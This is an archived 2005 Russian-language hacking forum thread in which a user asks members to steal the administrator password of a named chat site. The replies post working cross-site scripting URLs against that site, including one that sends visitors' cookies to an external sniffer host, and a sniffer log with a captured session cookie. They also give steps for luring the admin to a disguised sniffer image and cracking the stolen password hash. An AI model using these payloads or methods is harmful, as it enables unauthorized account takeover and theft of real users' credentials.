Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Чаты (https://forum.antichat.xyz/forumdisplay.php?f=10)
-   -   Взлом пароля админа чата (https://forum.antichat.xyz/showthread.php?t=9799)

DJ Frost 30.09.2005 19:54

Взлом пароля админа чата
 
Здраствуйте, уважаемая администрация AntiChat.ru да и все остальные люди, сидящие на форуме :)

У меня к Вам огромная просьба. Очень хотелось бы, чтобы Вы взломали чат http://chat.ctc-tv.ru и смогли узнать пароль администратора чата. Логин boston.

Заранее, благодарен. Пароль прошу выслать на этот e-mail maxbog2002@yandex.ru

africanec 30.09.2005 19:59

ага все сразу же побежали <<за благодарность
------------------------------------------------------
за $ предложил бы

DJ Frost 30.09.2005 20:52

Ну помогите задаром плиз!

Puff 30.09.2005 21:19

http://chat.ctc-tv.ru/cgi/newchat.exe?<script>alert();</script>

DJ Frost 30.09.2005 21:28

А что за ссылка? Я ввел, вылезло окошко и Test =
Query =
Form =


Что с этим делать? Объясните пожалуйста!

Puff 30.09.2005 21:31

Ну еще у тебя алерт выскочил, да?!
Теперь заходи в раздел ХСС на форуме и читай про это!

DJ Frost 30.09.2005 21:36

Пуф, а без чтения не получится? Ты, пожалуйста, точно скажи, получится ли вообще, или нет. И если да, то пришли мне на мыло результат. Умоляю!

Puff 30.09.2005 21:38

http://chat.ctc-tv.ru/cgi/newchat.exe?Com=Send&Get=OneMessages&Login=<script >alert(document.cookie);</script>&Room=1&SID=
Вот тебе еще одна ХСС! Какой тебе результат прислать??? Знаешь, я в универе сейчас научную работу пишу, поэтому мне не до результатов.

DJ Frost 30.09.2005 21:43

Именно пароль мне интересен. Или как вводить логин и узнавать пароль для него. Вот что.

P.s. Извини, что отвлекаю от научной работы.

Puff 30.09.2005 21:47

А зачем тебе вводить логин(ваще не понял куда ты его собрался пихать) не зная пароль?! Мани народ на сниффер! Про снифер читай тут(http://antichat.ru/sniff/)!
П.С. без читалова ниче не выйдет, конечно если тебе не помогут тут!!!
ПОка! :)

DJ Frost 30.09.2005 21:49

Ну блин. Вот ты мне дал ссылку с Xss. Мне надо было узнать пароль администратора. Как мне его узнать? При помощи этой ссылке? И вообще для чего она нужна в данном случаи? Объясни пожалуйста!

DJ Frost 30.09.2005 21:56

Объясните ламеру на пальцах! Очень прошу!

Антошка2003 30.09.2005 22:47

никак, троянь админа, ставь снифферы и т.д., только тогда может что то выйдет. хотя может база пассов где то лежит.

DJ Frost 30.09.2005 23:12

А как просечь эту базу пассов?

Антошка2003 30.09.2005 23:16

а я ипу? если там вообще таковая имееться.

DJ Frost 30.09.2005 23:47

Если ты не ипешь, то зачем тогда отписываешься? :) Скажи свое предложение по взлому.)

Антошка2003 01.10.2005 00:30

я предлагаю возможные варианты для сливания паролей.
я так мельком глянул, вроде при реге цвет текста символами ставиться... просмотри внимательнее сам
p.s. форум посмотри. в разделе Уязвимости форумов, форум там phpbb, может пасс на форум и чат один.
p.s.s.Воткни снифер в анкету, во ввод домашней страницы или ещё что и разведи админа на то, чтобы он просмотел твою анкету (инфу по другому), потом скачай прогу md5hashes и бруть пароль, по пповоду md5 тоже написано в разделе "Уязвимости форумв"

SK | Heaton 01.10.2005 07:27

2 DJ Frost, ну что получил хеш ?!
Вроде Антошка2003 все объяснил и показал пальцем..

DJ Frost 01.10.2005 10:50

Не получил. Может кто в аську зайти? Объяснить не через форум.

Антошка2003 01.10.2005 11:06

что получил, торможу что то.

SK | Heaton 01.10.2005 11:09

Закинь сниффер в свою анкету http://antichat.ru/cgi-bin/s.jpg, на поле Мой сайт.
И сделай так чтоб Админ просмотрел анкету. Потом если все будет тип-топ,
сниффер свое дело сделает..

Есть еще один старый тупой способ, пишешь пост и со ссылкой на http://antichat.ru/cgi-bin/s.jpg и гриш ПОСМОТРИТЕ ПРИКОЛ или что нить в этом роде. они нажимают. а ты тем временим будешь смотреть лог на http://antichat.ru/sniff/log.php будешь ждать хеш своего админа примерно будет выглядит так
member_id=62; pass_hash=2374793277fbb618d2f337d458239719;
ну я так думаю ты знаешь id твоей жертвый ?!

Антошка2003 01.10.2005 11:13

я уже говорил об этом

SK | Heaton 01.10.2005 11:18

2 Антошка2003 я в курсе.. Он просто не понял... Вот и до словно пишу.. :)

DJ Frost 01.10.2005 11:26

Тот админ редко заходит. Ну получу я хеш? И что с ним делать?

NIGHT_WOLF 01.10.2005 11:40

О а дальше брат серьёзное дело... Расшифровка.
Качаешь PasswordPro и словариков к нему и начинаешь расшифровывать тот хэш который ты вытащил с форума.

DJ Frost 01.10.2005 12:11

Сможете помочь? :)

NIGHT_WOLF 01.10.2005 12:14

С расшифровкой ?

DJ Frost 01.10.2005 12:31

Да, если можно. )

SK | Heaton 01.10.2005 12:49

посари http://forum.antichat.ru/thread9373.html

Антошка2003 01.10.2005 13:02

делай всё сам, всё написано доступным текстом, за тебя делать никто не будет, только советовать.

SK | Heaton 01.10.2005 13:25

и это правда... Если возникнут вопросы. пиши, только сначала ищи в форуме. Об этой теме очень много сказано тут.

TANZWUT 02.10.2005 10:12

А лучше всего свой сниф, зальёш на сайт к примеру _http://url/pricol/pic1.gif
и вместо прозрачной картинки поставиш любую прикольную картинку... и никто незаподозрит что это снифер, даже тот самый админ...;)

DJ Frost 02.10.2005 10:38

Значит, как я понял, я получу со сниффера информацию, а затем её засуну в прогу для расшифрования хешей и получу пароль админа??? :)


Тока проблем. А можно как-нить просечь, есть ли там база с пассами? Админ, который мне нужен очень редко заходит. Что в этом случаи делать?

TANZWUT 02.10.2005 11:16

Да:) по поводу снифа смотри http://forum.antichat.ru/forum37.html
и смотри видео по взлому http://video.antichat.net/videos/Sil...chatmoscow.rar

Антошка2003 02.10.2005 12:26

Влад, эт ты типа мне уже написал о том нашем разговоре?))))
Я тоже думал об этом, просто ему еботни много, хотя...

TANZWUT 02.10.2005 14:47

_http://chat.ctc-tv.ru/cgi/newchat.exe?<script>img/**/=/**/new/**/Image();/**/img.src/**/=/**/"http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>

[Sun Oct 2 14:23:53 2005] IP=84.ххх.ххх.ххх SITE=chat.ctc-tv.ru
REFERER=http://chat.ctc-tv.ru/cgi/newchat.exe?<script>img/**/=/**/new/**/Image();/**/img.src/**/=/**/"http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>
QUERY=NAME=03862766249104212349; DISSID; DISNUM; login=extaze
AGENT=Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MRA 4.2 (build 01102); .NET CLR 1.0.3705; Media Center PC 3.1; .NET CLR 1.1.4322)

Антошка2003 02.10.2005 14:57

да это ничего не даст, пример ток.

TANZWUT 02.10.2005 15:01

а я ему пример и показал...
я просто в логе снифа видел всякие там попытки...

DJ Frost 03.10.2005 17:17

Не х.я не получилось :( :(

К.е.Н 03.10.2005 18:17

Цитата

А лучше всего свой сниф, зальёш на сайт к примеру _http://url/pricol/pic1.gif
и вместо прозрачной картинки поставиш любую прикольную картинку... и никто незаподозрит что это снифер, даже тот самый админ...Цитата
Снивер ты туда не зальешь можно взломать через скрипты но пробовать тебе пбесплатно никто не будет.


Время: 01:02